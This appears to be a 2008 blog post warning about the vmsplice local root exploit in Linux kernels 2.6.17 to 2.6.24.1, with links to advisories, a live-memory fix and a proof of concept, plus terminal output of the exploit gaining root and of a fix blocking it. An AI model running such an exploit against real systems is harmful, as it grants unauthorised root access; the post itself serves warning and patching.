Linux Kernel exploit for 2.6.17 up to 2.6.24.1
February 11th, 2008
Today I encountered some serious exploits floating around in Full disclosure, Bugtraq and even Slashdot.
Better monkey patch your multiuser machines fast, before the script kiddies get a grip on this...
- LKML about this issue
- Slashdot Article
- Debian Bugtrack about this exploit
- Live Memory fix, which inserts a ret at the beginning of vmsplice()
- Full exploit POC
[0:07][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f9e000 .. 0xb7fd0000 [+] root bash: 0STY: command not found root@gemini:~/programming/linux/exploits# whoami root root@gemini:~/programming/linux/exploits#
Beware of the live memory fix as some people experienced memory faults and system breakdowns.
[0:13][br@gemini:programming/linux/exploits]% ./disable_exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7fa8000 .. 0xb7fda000 [+] root Exploit gone! [0:14][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f7c000 .. 0xb7fae000 [-] vmsplice [0:14][br@gemini:programming/linux/exploits]% whoami br
Update:
For more indepth analysis of what has been going on why, what, etc. find a nice LWN article here.